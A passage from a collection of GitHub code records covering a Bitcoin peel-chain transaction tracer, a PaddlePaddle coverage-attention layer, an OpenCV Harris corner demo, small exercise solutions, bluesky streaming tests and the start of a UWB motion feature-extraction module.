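        # a typical \"peel chain\" hop pays one target address and returns change to a second address, so the tracer below only follows two-output transactions\n        if len(self.txData['out']) == 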
2:\n            return True\n        return False\n\n    def isSingleInput(self):\n        if len(self.txData['inputs']) == 1:\n            return True\n        return False\n\n    def getTime(self):\n        uTime = self.txData['time']\n        txTime = datetime.datetime.fromtimestamp(uTime)\n        return str(txTime)\n\n    def getBalance(self):\n        return self.addrData['final_balance']\n\n\nheader = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',\n    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'}\n\nblock = BlockChain()\n\n# bring the address from an Excel file\nlocation = \"D:\\python\"\n# file = \"all node.xlsx\"\n# data_pd = pd.read_excel('{}/{}'.format(location, file), header=None, index_col=None, names=None)\n# address = pd.DataFrame.to_numpy(data_pd)\n# address = '1KLsKGS1RyAUmuPG2pgCJM1B9FHeD4ezkU'\naddress = '14D4BuxgnB1AxPoJ25oMVQ8DC6vdq1ex7i'\naddress = '1KTVSLLsD4N9N3bYqfhUxbUoKZbR8GJyAa'\naddress = '16mMg3Cb6dTq4igsqvjuuTMt5xcAEbVVXC'\naddress = '1DkXjYUqVQkgBeGeiMWcKDUf78DBe58gGi'\n\n\nnow = time.localtime()\ndate = \"%d%02d%02d%02d%02d%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec)\nf = open('D:\\python\\peelchainTime' + date + '.csv', 'a')\nf.write(\"Current Address,Next Address,Time,Fee\\n\")\n\nnextAddr = address\n\nfor x in range(0, 1000):\n    block.initAddress(nextAddr)\n    txList = block.getTxHashList()\n\n    for txhash in txList:\n        block.initHashInfo(txhash)\n\n        if block.isSingleInput() and block.isMultiOutput():\n            if block.txData['inputs'][0]['prev_out']['addr'] == block.addrData['address']:\n                txTime = block.getTime()\n                if block.txData['out'][0]['value'] > block.txData['out'][1]['value']:\n                    nextAddr = block.txData['out'][0]['addr']\n                else:\n                    nextAddr = block.txData['out'][1]['addr']\n\n                print(\"current addr : \" + block.txData['inputs'][0]['prev_out']['addr'])\n                print(\"next addr : \" + nextAddr)\n                print(\"Time : \" + txTime)\n                print(\"Fee : \" + str(block.txData['fee']/100000000))\n                print(\"Addr Type : \" + block.getAddrType())\n                print(\"Balance : \" + str(block.getBalance()))\n                f.write(block.txData['inputs'][0]['prev_out']['addr'] + \",\" + nextAddr + \",\" + txTime + \",\" + str(block.txData['fee']/100000000) + \",\" + block.getAddrType() +\n                    \",\" + str(block.getBalance()) + \"\\n\")\n\nf.close()\n","repo_name":"KeunWooBae/blockchain2","sub_path":"blocktime.py","file_name":"blocktime.py","file_ext":"py","file_size_in_byte":4876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1180623057","text":"def cropped_tuple(tpl, var):\n    line = [str(j_val) for j_val in tpl]\n    string = ''.join(line)\n    a = string.find(var)\n    b = string.find(var, a + 1)\n    if (a >= 0) and (b >= 0):\n        new_tpl = tuple(line[a:b + 1])\n    elif (a >= 0) and (b < 0):\n        new_tpl = tuple(line[a:])\n    else:\n        new_tpl = ()\n    return new_tpl\n\n\nmy_tpl = (2, 1, 3, 4, 5, 9, 7, 1, 6, 8, 0)\nelem = input('\\nEnter a random element: ')\nprint(cropped_tuple(my_tpl, elem))\n\n# accepted!\n","repo_name":"Mihalich2981/Python","sub_path":"Module20/03_function/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33251749932","text":"import paddle\nimport paddle.nn as nn\n\n\nclass Attention(nn.Layer):\n    def __init__(self, params):\n        super(Attention, self).__init__()\n        self.params = params\n
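        # coverage attention: alpha_sum accumulates the attention maps of earlier decoding steps (forward() adds each new alpha back into alpha_sum)\n        # 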
hidden_size: 256\n        self.hidden = params['decoder']['hidden_size']\n        # attention_dim: 512\n        self.attention_dim = params['attention']['attention_dim']\n        self.hidden_weight = nn.Linear(self.hidden, self.attention_dim)\n        # spatial attention\n        \n        self.attention_conv = nn.Conv2D(1, 512, kernel_size=11, padding=5, bias_attr=False)\n        self.attention_weight = nn.Linear(512, self.attention_dim, bias_attr=False)\n        self.alpha_convert = nn.Linear(self.attention_dim, 1)\n\n    def forward(self, cnn_features, cnn_features_trans, hidden, alpha_sum, image_mask=None):\n        # W_h*h_t: b 256 -> b 512 (b attention_dim)\n        query = self.hidden_weight(hidden)\n        # A (coverage_alpha): b 1 H W -> b 512 H W, used for the channel transformation\n        alpha_sum_trans = self.attention_conv(alpha_sum)\n        # W_a*A: b 512 h w -> b h w 512 -> b h w attention_dim\n        \n        coverage_alpha = self.attention_weight(paddle.transpose(alpha_sum_trans,[0,2,3,1]))\n        # w_T*tanh( W_a*A + W_h*h_t + T + P) + b\n        # tensor addition broadcasts, so the size after the sum is b h w 512\n        \n        alpha_score = paddle.tanh(paddle.unsqueeze(query,[1, 2]) + coverage_alpha + paddle.transpose(cnn_features_trans,[0,2,3,1]))\n        \n        # b h w 512 -> b h w 1\n        energy = self.alpha_convert(alpha_score)\n        # normalize before exponentiating, for numerical stability\n        # energy = energy - energy.max()\n        # energy = energy - paddle.max(energy,keepdim=True)\n        # energy = energy - paddle.max(energy,keepdim=False)\n        energy = energy - energy.max()\n        # b h w 1 -> b h w \n        # energy_exp = paddle.exp(energy.squeeze(-1))\n        energy_exp = paddle.exp(paddle.squeeze(energy,-1))\n        # image_mask: b 1 max_h max_w\n        # * is element-wise multiplication: b h w -> b max_h max_w\n        if image_mask is not None:\n            # energy_exp = energy_exp * image_mask.squeeze(1)\n            energy_exp = energy_exp * paddle.squeeze(image_mask,1)\n\n        \n        alpha = energy_exp / (paddle.unsqueeze(paddle.sum(paddle.sum(energy_exp,-1),-1),[1,2]) + 1e-10)\n        \n        alpha_sum = paddle.unsqueeze(alpha,1) + alpha_sum\n        \n        context_vector = paddle.sum(paddle.sum((paddle.unsqueeze(alpha,1) * cnn_features),-1),-1)\n        return context_vector, alpha, alpha_sum","repo_name":"Lllllolita/CAN_Paddle","sub_path":"alignment/step1-5/can_paddle/models/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":2488,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"22634989741","text":"class Solution:\n    def splitString(self, s: str) -> bool:\n        def backtrack(res, x):\n            if not x:\n                return True\n\n            for i in range(1, n+1):\n\n                if not res or int(x[:i]) == res[-1] - 1:\n                    res.append(int(x[:i]))\n\n                    if backtrack(res, x[i:]) and len(res) > 1:\n                        return True\n                    res.pop()\n\n            return False\n        n = len(s)\n        return backtrack([], s)\n    ","repo_name":"jealsab/Competitive-Programming","sub_path":"1849-splitting-a-string-into-descending-consecutive-values/1849-splitting-a-string-into-descending-consecutive-values.py","file_name":"1849-splitting-a-string-into-descending-consecutive-values.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2815489320","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 18 18:17:58 2021\n\n@author: user\n\"\"\"\n\nimport numpy as np\nimport cv2\n\nimg = cv2.imread(\"./floor.jpg\")\ncv2.imshow('ori', img)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\ngray = np.float32(gray)\n\n# the smaller blockSize is, the harder it becomes to judge a corner\n# ksize can be at most equal to blockSize\n# ksize is the aperture used by the Gaussian-Sobel formula; the larger it is, the less finely detail is handled\n# if ksize equals blockSize, only one blockSize pass is done; the smaller ksize is, the more blockSize passes are done\n# the larger k is, the more pronounced a corner must be in order to be detected; conversely, with a smaller k even slight corners can be detected\n
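# Harris response per pixel: R = det(M) - k*(trace(M))^2; large R marks a corner\ndst = 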
cv2.cornerHarris(gray,5,1,0.1)\ndst = cv2.dilate(dst, None)\nimg[dst>0.01*dst.max()] = [0,0,255]\ncv2.imshow('result', img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n\n","repo_name":"TheRiseOfDavid/NTUTcs_media","sub_path":"hw06/david/t01.py","file_name":"t01.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6744124030","text":"import math\nimport pytest\n\nimport numpy as np\n\nfrom bluesky.callbacks import CallbackCounter\nfrom bluesky.examples import stepscan\nfrom bluesky.tests.utils import DocCollector\nfrom bluesky.callbacks.stream import LiveDispatcher\n\n# Do not run these tests if streamz is not installed\ntry:\n    import streamz\n    has_streamz = True\nexcept ImportError:\n    has_streamz = False\n\nrequires_streamz = pytest.mark.skipif(not has_streamz,\n                                      reason='Missing streamz library')\n\n\nclass NegativeStream(LiveDispatcher):\n    \"\"\"Stream that only adds metadata to start document\"\"\"\n    def start(self, doc):\n        doc.update({\"stream_level\": \"boring\"})\n        super().start(doc)\n\n    def event(self, doc):\n        modified = dict()\n        for key, val in doc['data'].items():\n            modified['modified_{}'.format(key)] = -math.fabs(val)\n        doc['data'] = modified\n        return super().event(doc)\n\n\nclass AverageStream(LiveDispatcher):\n    \"\"\"Stream that averages data points together\"\"\"\n    def __init__(self, n=None):\n        self.n = n\n        self.in_node = None\n        self.out_node = None\n        self.averager = None\n        super().__init__()\n\n    def start(self, doc):\n        \"\"\"\n        Create the stream after seeing the start document\n\n        The callback looks for the 'average' key in the start document to\n        configure itself.\n        \"\"\"\n        # Grab the average key\n        self.n = doc.get('average', self.n)\n        # Define our nodes\n        if not self.in_node:\n            self.in_node = streamz.Source(stream_name='Input')\n\n        self.averager = self.in_node.partition(self.n)\n\n        def average_events(cache):\n            average_evt = dict()\n            desc_id = cache[0]['descriptor']\n            # Check that all of our events came from the same configuration\n            if not all([desc_id == evt['descriptor'] for evt in cache]):\n                raise Exception('The events in this bundle are from '\n                                'different configurations!')\n            # Use the last descriptor to avoid strings and objects\n            data_keys = self.raw_descriptors[desc_id]['data_keys']\n            for key, info in data_keys.items():\n                # Information from non-number fields is dropped\n                if info['dtype'] in ('number', 'array', 'integer'):\n                    # Average together\n                    average_evt[key] = np.mean([evt['data'][key]\n                                                for evt in cache], axis=0)\n            return {'data': average_evt, 'descriptor': desc_id}\n\n        self.out_node = self.averager.map(average_events)\n        self.out_node.sink(super().event)\n        super().start(doc)\n\n    def event(self, doc):\n        \"\"\"Send an Event through the stream\"\"\"\n        self.in_node.emit(doc)\n\n    def stop(self, doc):\n        \"\"\"Delete the stream when run stops\"\"\"\n        self.in_node = None\n        self.out_node = None\n        self.averager = None\n        super().stop(doc)\n\n\ndef test_straight_through_stream(RE, hw):\n    # Just a stream that sinks the events it receives\n    ss = NegativeStream()\n    # Create callback chain\n    c = CallbackCounter()\n    d = DocCollector()\n    ss.subscribe(c)\n    ss.subscribe(d.insert)\n    # Run a basic plan\n    RE(stepscan(hw.det, hw.motor), {'all': ss})\n    # Check that our metadata is there\n    assert c.value == 10 + 1 + 2 # events, descriptor, start and stop\n    assert d.start[0]['stream_level'] == 'boring'\n    desc = d.descriptor[d.start[0]['uid']][0]\n    events = d.event[desc['uid']]\n    print(desc)\n    print([evt['data'] for evt in events])\n    
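# NegativeStream negates every reading, so every forwarded value must be <= 0\n    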
tmp_valid = all([evt['data'][key] <= 0\n for evt in events\n for key in evt['data'].keys()])\n assert tmp_valid\n tmp_valid = all([key in desc['data_keys']\n for key in events[0]['data'].keys()])\n assert tmp_valid\n\n\n@requires_streamz\ndef test_average_stream(RE, hw):\n # Create callback chain\n avg = AverageStream(10)\n c = CallbackCounter()\n d = DocCollector()\n avg.subscribe(c)\n avg.subscribe(d.insert)\n # Run a basic plan\n RE(stepscan(hw.det, hw.motor), {'all': avg})\n assert c.value == 1 + 1 + 2 # events, descriptor, start and stop\n # See that we made sensible descriptor\n start_uid = d.start[0]['uid']\n assert start_uid in d.descriptor\n desc_uid = d.descriptor[start_uid][0]['uid']\n assert desc_uid in d.event\n evt = d.event[desc_uid][0]\n assert evt['seq_num'] == 1\n assert all([key in d.descriptor[start_uid][0]['data_keys']\n for key in evt['data'].keys()])\n # See that we returned the correct average\n assert evt['data']['motor'] == -0.5 # mean of range(-5, 5)\n assert evt['data']['motor_setpoint'] == -0.5 # mean of range(-5, 5)\n assert start_uid in d.stop\n assert d.stop[start_uid]['num_events'] == {'primary': 1}\n","repo_name":"bluesky/bluesky","sub_path":"bluesky/tests/test_streams.py","file_name":"test_streams.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"37"} +{"seq_id":"41586343650","text":"import functools\nfrom operator import or_\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import find_peaks, peak_prominences, peak_widths\nfrom sklearn import preprocessing\n\nfrom .uwb_motion_filters import TrayMotionButterFiltFiltFilter, TrayMotionSavGolFilter\nfrom .utils.log import logger\nfrom .utils.util import filter_by_data_type\n\n\nclass FeatureExtraction:\n def __init__(\n self,\n resample_frequency=\"100ms\",\n position_filter=TrayMotionButterFiltFiltFilter(useSosFiltFilt=True),\n velocity_filter=TrayMotionSavGolFilter(),\n ):\n self.resample_frequency = resample_frequency\n self.position_filter = position_filter\n self.velocity_filter = velocity_filter\n\n self.le = preprocessing.LabelEncoder()\n self.le.fit([\"dwtag100\", \"pt202\"])\n\n VELOCITY_COLUMNS = [\n \"quality\",\n \"anchor_count\",\n # \"x_position\",\n # \"y_position\",\n # \"z_position\",\n \"x_position_smoothed\",\n \"y_position_smoothed\",\n \"z_position_smoothed\",\n \"x_velocity_smoothed\",\n \"y_velocity_smoothed\",\n \"z_velocity_smoothed\",\n \"x_velocity_smoothed_magnitude\",\n \"y_velocity_smoothed_magnitude\",\n \"z_velocity_smoothed_magnitude\",\n \"velocity_vector_magnitude\",\n \"velocity_vector_magnitude_xy\",\n \"x_velocity_mean\",\n \"y_velocity_mean\",\n \"z_velocity_mean\",\n \"velocity_average_mean\",\n \"velocity_vector_magnitude_mean\",\n \"velocity_vector_magnitude_mean_xy\",\n \"x_velocity_stddev\",\n \"y_velocity_stddev\",\n \"z_velocity_stddev\",\n \"velocity_average_stddev\",\n \"velocity_vector_magnitude_stddev\",\n \"velocity_vector_magnitude_stddev_xy\",\n \"x_velocity_skew\",\n \"y_velocity_skew\",\n \"z_velocity_skew\",\n \"velocity_average_skew\",\n \"velocity_vector_magnitude_skew\",\n \"velocity_vector_magnitude_skew_xy\",\n \"x_velocity_variance\",\n \"y_velocity_variance\",\n \"z_velocity_variance\",\n \"velocity_average_variance\",\n \"velocity_vector_magnitude_variance\",\n \"velocity_vector_magnitude_variance_xy\",\n \"x_velocity_kurtosis\",\n \"y_velocity_kurtosis\",\n \"z_velocity_kurtosis\",\n \"velocity_average_kurtosis\",\n 
\"velocity_vector_magnitude_kurtosis\",\n \"velocity_vector_magnitude_kurtosis_xy\",\n \"x_y_velocity_correlation\",\n \"x_z_velocity_correlation\",\n \"y_z_velocity_correlation\",\n \"x_velocity_correlation_sum\",\n \"y_velocity_correlation_sum\",\n \"z_velocity_correlation_sum\",\n ]\n\n ACCELERATION_COLUMNS = [\n \"x_acceleration_normalized\",\n \"y_acceleration_normalized\",\n \"z_acceleration_normalized\",\n \"acceleration_vector_magnitude\",\n \"x_acceleration_mean\",\n \"y_acceleration_mean\",\n \"z_acceleration_mean\",\n \"acceleration_average_mean\",\n \"acceleration_vector_magnitude_mean\",\n \"x_acceleration_sum\",\n \"y_acceleration_sum\",\n \"z_acceleration_sum\",\n \"acceleration_average_sum\",\n \"acceleration_vector_magnitude_sum\",\n \"x_acceleration_min\",\n \"y_acceleration_min\",\n \"z_acceleration_min\",\n \"acceleration_average_min\",\n \"acceleration_vector_magnitude_min\",\n \"x_acceleration_max\",\n \"y_acceleration_max\",\n \"z_acceleration_max\",\n \"acceleration_average_max\",\n \"acceleration_vector_magnitude_max\",\n \"x_acceleration_stddev\",\n \"y_acceleration_stddev\",\n \"z_acceleration_stddev\",\n \"acceleration_average_stddev\",\n \"acceleration_vector_magnitude_stddev\",\n \"x_acceleration_skew\",\n \"y_acceleration_skew\",\n \"z_acceleration_skew\",\n \"acceleration_average_skew\",\n \"acceleration_vector_magnitude_skew\",\n \"x_acceleration_variance\",\n \"y_acceleration_variance\",\n \"z_acceleration_variance\",\n \"acceleration_average_variance\",\n \"acceleration_vector_magnitude_variance\",\n \"x_acceleration_kurtosis\",\n \"y_acceleration_kurtosis\",\n \"z_acceleration_kurtosis\",\n \"acceleration_average_kurtosis\",\n \"acceleration_vector_magnitude_kurtosis\",\n \"x_acceleration_energy\",\n \"y_acceleration_energy\",\n \"z_acceleration_energy\",\n \"acceleration_average_energy\",\n \"acceleration_vector_magnitude_energy\",\n \"x_y_acceleration_correlation\",\n \"x_z_acceleration_correlation\",\n \"y_z_acceleration_correlation\",\n \"x_acceleration_correlation_sum\",\n \"y_acceleration_correlation_sum\",\n \"z_acceleration_correlation_sum\",\n ]\n\n GYROSCOPE_COLUMNS = [\"x_dps\", \"y_dps\", \"z_dps\"]\n\n MAGNETOMETER_COLUMNS = [\"x_μT\", \"y_μT\", \"z_μT\"]\n\n ALL_FEATURE_COLUMNS = [\n \"device_part_number_label_id\",\n *VELOCITY_COLUMNS,\n *ACCELERATION_COLUMNS,\n *GYROSCOPE_COLUMNS,\n *MAGNETOMETER_COLUMNS,\n ]\n\n def extract_motion_features_for_multiple_devices(\n self,\n df_uwb_data: pd.DataFrame,\n entity_type=\"all\",\n fillna=None,\n filter_wos=True,\n join=\"outer\",\n ):\n if (\n (df_uwb_data is None)\n or ((df_uwb_data is not None and len(df_uwb_data) == 0))\n or ((df_uwb_data is not None and \"entity_type\" not in df_uwb_data.columns))\n ):\n return None\n\n df_uwb_data = df_uwb_data.copy()\n\n if entity_type is None:\n entity_type = \"all\"\n\n if entity_type.lower() != \"all\":\n df_uwb_data = df_uwb_data[df_uwb_data[\"entity_type\"].str.lower() == entity_type.lower()]\n\n if filter_wos:\n df_uwb_data = self.filter_uwb_data_by_acceleration_activity(df_uwb_data=df_uwb_data)\n\n all_features = []\n for device_id, df_device_uwb_data in df_uwb_data.groupby(by=\"device_id\"):\n logger.info(f\"Calculating motion features for device ID {device_id}\")\n\n df_device_uwb_data = df_device_uwb_data.sort_index()\n\n df_device_position = filter_by_data_type(df_device_uwb_data, \"position\")\n df_device_acceleration = filter_by_data_type(df_device_uwb_data, \"accelerometer\")\n df_device_gyroscope = filter_by_data_type(df_device_uwb_data, 
\"gyroscope\")\n df_device_magnetometer = filter_by_data_type(df_device_uwb_data, \"magnetometer\")\n\n df_features = self.extract_motion_features(\n df_position=df_device_position,\n df_acceleration=df_device_acceleration,\n df_gyroscope=df_device_gyroscope,\n df_magnetometer=df_device_magnetometer,\n fillna=fillna,\n filter_wos=filter_wos,\n join=join,\n )\n df_features[\"device_id\"] = device_id\n\n device_part_number = df_device_uwb_data[\"device_part_number\"].unique()[0].lower()\n df_features[\"device_part_number_label_id\"] = self.le.transform([device_part_number])[0]\n\n all_features.append(df_features)\n\n response = None\n if len(all_features) > 0:\n response = pd.concat(all_features)\n\n return response\n\n def extract_tray_motion_features_for_multiple_devices(self, df_uwb_data):\n return self.extract_motion_features_for_multiple_devices(\n df_uwb_data=df_uwb_data,\n entity_type=\"tray\",\n )\n\n def extract_motion_features(\n self,\n df_position,\n df_acceleration,\n df_gyroscope=None,\n df_magnetometer=None,\n fillna=\"forward_backward\",\n filter_wos=True,\n join=\"outer\",\n ):\n df_velocity_features = pd.DataFrame(columns=FeatureExtraction.VELOCITY_COLUMNS)\n if df_position is not None:\n df_velocity_features = self.extract_velocity_features(df=df_position)\n\n df_acceleration_features = pd.DataFrame(columns=FeatureExtraction.ACCELERATION_COLUMNS)\n if df_acceleration is not None:\n df_acceleration_features = self.extract_acceleration_features(df=df_acceleration, filter_wos=filter_wos)\n\n df_gyroscope_features = pd.DataFrame(columns=FeatureExtraction.GYROSCOPE_COLUMNS)\n if df_gyroscope is not None and len(df_gyroscope) > 0:\n df_gyroscope_features = self.extract_gyroscope_features(df=df_gyroscope)\n\n df_magnetometer_features = pd.DataFrame(columns=FeatureExtraction.MAGNETOMETER_COLUMNS)\n if df_magnetometer is not None and len(df_magnetometer) > 0:\n df_magnetometer_features = self.extract_magnetometer_features(df=df_magnetometer)\n\n df_features = (\n df_velocity_features.join(df_acceleration_features, how=join)\n .join(df_gyroscope_features, how=join)\n .join(df_magnetometer_features, how=join)\n )\n\n df_features = df_features.reindex(\n columns=[\n *FeatureExtraction.VELOCITY_COLUMNS,\n *FeatureExtraction.ACCELERATION_COLUMNS,\n *FeatureExtraction.GYROSCOPE_COLUMNS,\n *FeatureExtraction.MAGNETOMETER_COLUMNS,\n ]\n )\n\n df_features.replace([np.inf, -np.inf], np.nan, inplace=True)\n\n logger.info(f\"Using fillna method: {fillna}\")\n if fillna == \"average\":\n df_features.fillna(df_features.mean(), inplace=True)\n elif fillna == \"drop\":\n df_features.dropna(inplace=True)\n elif fillna == \"pad\":\n df_features.fillna(method=\"pad\", inplace=True)\n elif fillna == \"forward_backward\":\n logger.info(\"Applying forward_backward filter to feature set\")\n df_features = df_features.fillna(method=\"ffill\").fillna(method=\"bfill\")\n elif fillna == \"interpolate\": # linear interpolation, use bfill to fill in nan's at front of dataframe\n logger.info(\"Applying standard bfill interpolation filter to feature set\")\n df_features = df_features.interpolate().fillna(method=\"bfill\")\n\n return df_features\n\n def extract_velocity_features(self, df):\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_position\", \"y\": \"y_position\", \"z\": \"z_position\"}, inplace=True)\n\n if \"x_meters\" in df.columns:\n df.rename(\n columns={\"x_meters\": \"x_position\", \"y_meters\": \"y_position\", \"z_meters\": \"z_position\"}, inplace=True\n )\n\n df = 
self.average_xyz_duplicates(df, x_col=\"x_position\", y_col=\"y_position\", z_col=\"z_position\")\n\n        df = df.reindex(columns=[\"x_position\", \"y_position\", \"z_position\", \"quality\", \"anchor_count\"])\n        df = self.regularize_index_and_smooth(df)\n        df = self.calculate_velocity_features(df=df)\n        df = df.sort_index()\n        return df\n\n    def extract_acceleration_features(self, df, filter_wos=True):\n        df = df.copy()\n\n        if \"x\" in df.columns:\n            df.rename(columns={\"x\": \"x_gs\", \"y\": \"y_gs\", \"z\": \"z_gs\"}, inplace=True)\n\n        df = self.average_xyz_duplicates(df, x_col=\"x_gs\", y_col=\"y_gs\", z_col=\"z_gs\")\n        df = self.normalize_acceleration(df, x_col=\"x_gs\", y_col=\"y_gs\", z_col=\"z_gs\")\n\n        # df_acceleration_for_device_by_peaks = self.remove_wos_acceleration_peaks(\n        #     df=df,\n        #     x_col=\"x_acceleration_normalized\",\n        #     y_col=\"y_acceleration_normalized\",\n        #     z_col=\"z_acceleration_normalized\",\n        #     require_peak_across_all_axes=False)\n\n        if filter_wos:\n            df = self.remove_wos_initial_acceleration_reading_by_time_gaps(df)\n\n        df = df.reindex(columns=[\"x_gs\", \"y_gs\", \"z_gs\"])\n        df = self.regularize_index_and_smooth(df)\n        df = self.calculate_acceleration_features(\n            df=df,\n        )\n        df = df.drop(columns=[\"x_gs\", \"y_gs\", \"z_gs\"]).sort_index()\n        return df\n\n    def extract_gyroscope_features(self, df):\n        df = df.copy()\n\n        if \"x\" in df.columns:\n            df.rename(columns={\"x\": \"x_dps\", \"y\": \"y_dps\", \"z\": \"z_dps\"}, inplace=True)\n\n        df = self.average_xyz_duplicates(df, x_col=\"x_dps\", y_col=\"y_dps\", z_col=\"z_dps\")\n\n        df = df.reindex(columns=[\"x_dps\", \"y_dps\", \"z_dps\"])\n        df = self.regularize_index_and_smooth(df)\n        return df\n\n    def extract_magnetometer_features(self, df):\n        df = df.copy()\n\n        if \"x\" in df.columns:\n            df.rename(columns={\"x\": \"x_μT\", \"y\": \"y_μT\", \"z\": \"z_μT\"}, inplace=True)\n\n        df = self.average_xyz_duplicates(df, x_col=\"x_μT\", y_col=\"y_μT\", z_col=\"z_μT\")\n\n        df = df.reindex(columns=[\"x_μT\", \"y_μT\", \"z_μT\"])\n        df = self.regularize_index_and_smooth(df)\n        return df\n\n    def regularize_index_and_smooth(self, df):\n        df = df.copy()\n\n        if len(df) == 0:\n            return df\n\n        df = df.astype(float)\n        df = df.loc[~df.index.duplicated()].copy()\n\n        start = df.index.min().floor(self.resample_frequency)\n        end = df.index.max().ceil(self.resample_frequency)\n\n        regularized_index = pd.date_range(start=start, end=end, freq=self.resample_frequency)\n        df = df.reindex(df.index.union(regularized_index))\n        df = df.interpolate(method=\"time\", limit=5, limit_area=\"inside\")\n\n        # Drop all rows that have an NA value (excluding the anchor_count column)\n        df = df.reindex(regularized_index).dropna(subset=df.columns.difference([\"anchor_count\"]))\n        # if fillna == 'interpolate':\n        #     df = df.interpolate(method=\"linear\", limit_area=\"inside\")\n        # else:\n        #     df = df.fillna(value=0.0) # .dropna(subset=df.columns.difference([\"anchor_count\"]))\n\n        # df = df.reindex(regularized_index)\n        df = df.bfill().ffill()\n        return df\n\n    def detect_peaks(self, np_array, width=None, min_height_as_percentage_of_max=0.8):\n        \"\"\"\n        This method uses Scipy find_peaks to extract peaks, peak 'widths', and peak 'prominences'.\n\n        Note, data should be normalized before using this method.\n\n        :param np_array: Expects a numpy array of values. This method works on a single axis of data at a time.\n        :param width: See the Scipy find_peaks::width attribute. 
In short, this parameter constrains the min/max width of a peak\n        :param min_height_as_percentage_of_max: See the Scipy find_peaks::height attribute. The minimum height is set as a percentage of the max value in the provided numpy array.\n        :return: (peaks, widths, prominences)\n        \"\"\"\n        np_array = np_array.copy()\n        np_array.reset_index(drop=True, inplace=True)\n\n        # find_peaks will miss peaks at the front and back of an array unless we prepend and append min values to the array being analyzed\n        augmented_np_array = np.concatenate(([min(np_array)], np_array, [min(np_array)]))\n\n        peaks, _ = find_peaks(\n            augmented_np_array, width=width, height=(max(augmented_np_array) * min_height_as_percentage_of_max, None)\n        )\n        widths = peak_widths(augmented_np_array, peaks)[0]\n        prominences = peak_prominences(augmented_np_array, peaks)[0]\n\n        # compensate for the prepended value in the augmented_x array that was analyzed\n        peaks -= 1\n\n        return peaks, widths, prominences\n\n    def average_xyz_duplicates(self, df, x_col=\"x\", y_col=\"y\", z_col=\"z\", group_by_cols=None, inplace=False):\n        \"\"\"\n        Ciholas' IMU system will sometimes output multiple readings at the same time (\"same time\" as measured after we lost access to the Ciholas network_time attribute).\n\n        This method will average the x/y/z values for any of those duplicates and the duplicates will be removed.\n\n        :param df: DF with time index\n        :param x_col:\n        :param y_col:\n        :param z_col:\n        :param group_by_cols: By default, the dataframe will be deduped by the index. Alternatively, an array of columns can be provided to group by.\n        :param inplace:\n        :return: Dataframe\n        \"\"\"\n        if not inplace:\n            df = df.copy()\n\n        # ['socket_read_time', 'device_id']\n        if group_by_cols is None:\n            df[\"tmp_group_by_index\"] = df.index\n            group_by_cols = [\"tmp_group_by_index\"]\n\n        df_averaged = df.groupby(group_by_cols).agg({x_col: np.mean, y_col: np.mean, z_col: np.mean})\n\n        df = (\n            df.drop_duplicates(group_by_cols)\n            .drop(columns=[x_col, y_col, z_col])\n            .merge(df_averaged, left_on=group_by_cols, right_index=True, how=\"left\", suffixes=(\"_x\", None))\n        )\n\n        if \"tmp_group_by_index\" in group_by_cols:\n            df = df.drop(columns=[\"tmp_group_by_index\"])\n\n        return df\n\n    def calculate_velocity_features(self, df, inplace=False):\n        if not inplace:\n            df = df.copy()\n\n        if \"x\" in df.columns:\n            df.rename(columns={\"x\": \"x_position\", \"y\": \"y_position\", \"z\": \"z_position\"}, inplace=True)\n\n        df[\"x_position_smoothed\"] = self.position_filter.filter(series=df[\"x_position\"])\n        df[\"y_position_smoothed\"] = self.position_filter.filter(series=df[\"y_position\"])\n        df[\"z_position_smoothed\"] = self.position_filter.filter(series=df[\"z_position\"])\n        # Old method of computing velocity, switched to savgol with deriv=1\n        # df['x_velocity_smoothed']=df['x_acceleration_smoothed'].diff().divide(df.index.to_series().diff().apply(lambda dt: dt.total_seconds()))\n        # df['y_velocity_smoothed']=df['y_acceleration_smoothed'].diff().divide(df.index.to_series().diff().apply(lambda dt: dt.total_seconds()))\n\n        df[\"x_velocity_smoothed\"] = self.velocity_filter.filter(df[\"x_position_smoothed\"], deriv=1)\n        df[\"y_velocity_smoothed\"] = self.velocity_filter.filter(df[\"y_position_smoothed\"], deriv=1)\n        df[\"z_velocity_smoothed\"] = self.velocity_filter.filter(df[\"z_position_smoothed\"], deriv=1)\n\n        df[\"x_velocity_smoothed_magnitude\"] = df[\"x_velocity_smoothed\"].abs()\n        df[\"y_velocity_smoothed_magnitude\"] = df[\"y_velocity_smoothed\"].abs()\n        
